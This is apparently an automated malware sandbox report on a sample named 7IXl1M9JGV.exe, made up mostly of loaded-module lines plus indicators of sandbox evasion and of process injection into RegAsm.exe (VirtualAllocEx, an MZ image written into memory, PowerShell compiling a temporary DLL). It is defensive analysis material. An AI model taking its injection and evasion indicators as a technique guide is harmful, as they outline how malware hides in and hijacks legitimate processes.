      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\scoped_dir4212_1753283128Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\chrome_BITS_4212_794435973Jump to behavior
      Source: C:\Windows\System32\svchost.exeDirectory created: C:\Program Files\chrome_BITS_4212_794435973\BITA127.tmpJump to behavior
      Source: 7IXl1M9JGV.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 7IXl1M9JGV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: 7IXl1M9JGV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 7IXl1M9JGV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 7IXl1M9JGV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 7IXl1M9JGV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 7IXl1M9JGV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 7IXl1M9JGV.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"Jump to behavior
      Source: 7IXl1M9JGV.exeStatic PE information: section name: _RDATA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004452F3 pushfd ; iretd 7_2_004452FC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00448C84 push esi; iretd 7_2_00448C8D
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9919Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dllJump to dropped file
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740Thread sleep time: -90000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 9076Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F8D4C FindFirstFileExW,0_2_00007FF7D77F8D4C
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
      Source: svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2124987970.000001EE1228B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.2122521955.000001EE10635000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000AE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX)
      Source: chrome.exe, 00000008.00000002.2123857680.000001EE24E68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_7-18482
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043B600 LdrInitializeThunk,7_2_0043B600
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F18C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D77F18C8
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77FBC8C GetProcessHeap,0_2_00007FF7D77FBC8C
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F18C8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D77F18C8
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F12C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7D77F12C4
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F1A6C SetUnhandledExceptionFilter,0_2_00007FF7D77F1A6C
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeCode function: 0_2_00007FF7D77F6DB4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D77F6DB4

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: qh4rltex.dll.5.dr, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
      Source: qh4rltex.dll.5.dr, Engineers.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
      Source: qh4rltex.dll.5.dr, Engineers.csReference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.csJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
